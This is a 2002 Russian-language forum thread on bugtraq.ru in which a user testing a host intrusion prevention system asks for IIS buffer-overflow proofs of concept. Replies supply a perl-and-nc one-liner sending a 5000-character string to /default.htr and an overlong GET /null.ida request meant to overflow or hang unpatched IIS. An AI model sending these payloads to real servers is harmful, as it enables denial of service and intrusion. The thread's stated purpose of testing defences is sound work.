информационная безопасность
без паники и всерьез
 подробно о проектеRambler's Top100
Сетевые кракеры и правда о деле ЛевинаSpanning Tree Protocol: недокументированное применениеВсе любят мед
BugTraq.Ru
Русский BugTraq
 Анализ криптографических сетевых... 
 Модель надежности двухузлового... 
 Специальные марковские модели надежности... 
 Бэкдор в xz/liblzma, предназначенный... 
 Три миллиона электронных замков... 
 Doom на газонокосилках 
главная обзор RSN блог библиотека закон бред форум dnet о проекте
bugtraq.ru / форум / hacking
Имя Пароль
ФОРУМ
если вы видите этот текст, отключите в настройках форума использование JavaScript
регистрация





Легенда:
  новое сообщение
  закрытая нитка
  новое сообщение
  в закрытой нитке
  старое сообщение
  • Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания.
  • Новичкам также крайне полезно ознакомиться с данным документом.
Взлом IIS через buffer overflow 26.12.02 23:02  Число просмотров: 1953
Автор: lem0n Статус: Незарегистрированный пользователь
<"чистая" ссылка>
Пробовал, словила, падла.. На самом деле, просто telnet www.myiis.box 80 и потом:
GET /null.ida? [buffer=240bytes] = X HTTP/1.1
Host: www.worm.com
точно также переполняет буффер.
> попробуй так:
> perl -e 'print "GET /default.htr?"."A"x5000."\n\n" ' | nc
> iis.my.net 80
> иис (непатченый) должен зависнуть.
<hacking>
Взлом IIS через buffer overflow 26.12.02 22:23  
Автор: lem0n Статус: Незарегистрированный пользователь
<"чистая" ссылка>
Может кто подскажет, гда найти "proof of concept" реального buffer overflow для IIS? Тестирую Host Intrusion Prevention System, которая обещает защитить даже абсолютно "голый" IIS от переполнений баффера, даже в оригрнальной конфигурации с MDAC, scripts, ida/idq/htr ISAPI. Пока единственная программа, которая действительно переполняет буффер и чего-то делает - это Coldenair. Её мой HIPS словил и убил. Хочу попробовать другие.
Если кто знает - заранее благодарен.

З.Ы. Вещи типа Stealth, Satan, Retina и т. п. я уже пробовал - увы, они не проходят для тестирования, так как не пытаются провести само переполнение: быстрый тест и результат, который я знаю и без них - your system is vulnerable.
Взлом IIS через buffer overflow 26.12.02 22:49  
Автор: NKritsky <Nickolay A. Kritsky> Статус: Elderman
<"чистая" ссылка>
> Может кто подскажет, гда найти "proof of concept" реального
> buffer overflow для IIS? Тестирую Host Intrusion Prevention
> System, которая обещает защитить даже абсолютно "голый" IIS
> от переполнений баффера, даже в оригрнальной конфигурации с
> MDAC, scripts, ida/idq/htr ISAPI. Пока единственная
> программа, которая действительно переполняет буффер и
> чего-то делает - это Coldenair. Её мой HIPS словил и убил.
> Хочу попробовать другие.
> Если кто знает - заранее благодарен.
>

попробуй так:
perl -e 'print "GET /default.htr?"."A"x5000."\n\n" ' | nc iis.my.net 80
иис (непатченый) должен зависнуть.
Взлом IIS через buffer overflow 26.12.02 23:02  
Автор: lem0n Статус: Незарегистрированный пользователь
<"чистая" ссылка>
Пробовал, словила, падла.. На самом деле, просто telnet www.myiis.box 80 и потом:
GET /null.ida? [buffer=240bytes] = X HTTP/1.1
Host: www.worm.com
точно также переполняет буффер.
> попробуй так:
> perl -e 'print "GET /default.htr?"."A"x5000."\n\n" ' | nc
> iis.my.net 80
> иис (непатченый) должен зависнуть.
Взлом IIS через buffer overflow 26.12.02 23:55  
Автор: NKritsky <Nickolay A. Kritsky> Статус: Elderman
<"чистая" ссылка>
Смотрел http://www.insecure.org/sploits_microshit.html ?
Попробуй - полюбишь! ;-)
Взлом IIS через buffer overflow 27.12.02 17:41  
Автор: lem0n Статус: Незарегистрированный пользователь
<"чистая" ссылка>
> Смотрел http://www.insecure.org/sploits_microshit.html ?
> Попробуй - полюбишь! ;-)

Смотрел.. Проблема в том, что там в основном старье для взлома IIS 4.0, а я тестирую на 5.0.
Кстати, вот еще вопрос: есть информация о взломе Base64 encoding алгоритма, использующегося при Base Authentication в IIS? Поискал на Googlе, но ничего толкового не нашел.
1




Rambler's Top100
Рейтинг@Mail.ru


  Copyright © 2001-2024 Dmitry Leonov   Page build time: 0 s   Design: Vadim Derkach